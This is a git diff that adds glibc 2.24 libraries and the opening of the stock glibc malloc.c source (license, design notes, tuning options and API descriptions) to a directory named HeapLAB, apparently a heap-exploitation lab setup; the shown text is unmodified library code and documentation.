+strong_alias (__libc_free, __cfree) weak_alias (__libc_free, cfree)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+weak_alias (__malloc_get_state, malloc_get_state)
+weak_alias (__malloc_set_state, malloc_set_state)
+
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.24/ld-2.24.so b/HeapLAB/.glibc/glibc_2.24/ld-2.24.so
new file mode 100755
index 0000000..6abd837
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.24/ld-2.24.so differ
diff --git a/HeapLAB/.glibc/glibc_2.24/ld.so.2 b/HeapLAB/.glibc/glibc_2.24/ld.so.2
new file mode 120000
index 0000000..6b1a56f
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.24/ld.so.2
@@ -0,0 +1 @@
+ld-2.24.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.24/libc-2.24.so b/HeapLAB/.glibc/glibc_2.24/libc-2.24.so
new file mode 100755
index 0000000..2fece10
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.24/libc-2.24.so differ
diff --git a/HeapLAB/.glibc/glibc_2.24/libc.so.6 b/HeapLAB/.glibc/glibc_2.24/libc.so.6
new file mode 120000
index 0000000..77d3c6d
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.24/libc.so.6
@@ -0,0 +1 @@
+libc-2.24.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.24/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.24/malloc/malloc.c
new file mode 100644
index 0000000..1f5f166
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.24/malloc/malloc.c
@@ -0,0 +1,5288 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2016 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    cfree(void* p);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+    MALLOC_ALIGNMENT           MAX (2 * sizeof(INTERNAL_SIZE_T),
+				    __alignof__ (long double))
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <malloc-machine.h>
+#include <malloc-sysdep.h>
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-internal.h>
+
+#include <malloc/malloc-internal.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+
+/*
+  INTERNAL_SIZE_T is the word-size used for internal bookkeeping
+  of chunk sizes.
+
+  The default version is the same as size_t.
+
+  While not strictly necessary, it is best to define this as an
+  unsigned type, even if size_t is a signed type. This may avoid some
+  artificial size limitations on some systems.
+
+  On a 64-bit machine, you may be able to reduce malloc overhead by
+  defining INTERNAL_SIZE_T to be a 32 bit `unsigned int' at the
+  expense of not being able to handle more than 2^32 of malloced
+  space. If this limitation is acceptable, you are encouraged to set
+  this unless you are on a platform requiring 16byte alignments. In
+  this case the alignment requirements turn out to negate any
+  potential advantages of decreasing size_t word size.
+
+  Implementors: Beware of the possible combinations of:
+     - INTERNAL_SIZE_T might be signed or unsigned, might be 32 or 64 bits,
+       and might be the same width as int or as long
+     - size_t might have different width and signedness as INTERNAL_SIZE_T
+     - int and long might be 32 or 64 bits, and might be the same width
+  To deal with this, most comparisons and difference computations
+  among INTERNAL_SIZE_Ts should cast them to unsigned long, being
+  aware of the fact that casting an unsigned int to a wider long does
+  not sign-extend. (This also makes checking for negative numbers
+  awkward.) Some of these casts result in harmless compiler warnings
+  on some systems.
+*/
+
+#ifndef INTERNAL_SIZE_T
+#define INTERNAL_SIZE_T size_t
+#endif
+
+/* The corresponding word size */
+#define SIZE_SZ                (sizeof(INTERNAL_SIZE_T))
+
+
+/*
+  MALLOC_ALIGNMENT is the minimum alignment for malloc'ed chunks.
+  It must be a power of two at least 2 * SIZE_SZ, even on machines
+  for which smaller alignments would suffice. It may be defined as
+  larger than this though. Note however that code and data structures
+  are optimized for the case of 8-byte alignment.
+*/
+
+
+#ifndef MALLOC_ALIGNMENT
+# define MALLOC_ALIGNMENT       (2 * SIZE_SZ < __alignof__ (long double) \
+				 ? __alignof__ (long double) : 2 * SIZE_SZ)
+#endif
+
+/* The corresponding bit mask value */
+#define MALLOC_ALIGN_MASK      (MALLOC_ALIGNMENT - 1)
+
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always
+  be reallocated using malloc-copy-free sequences unless
+  the system supports MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
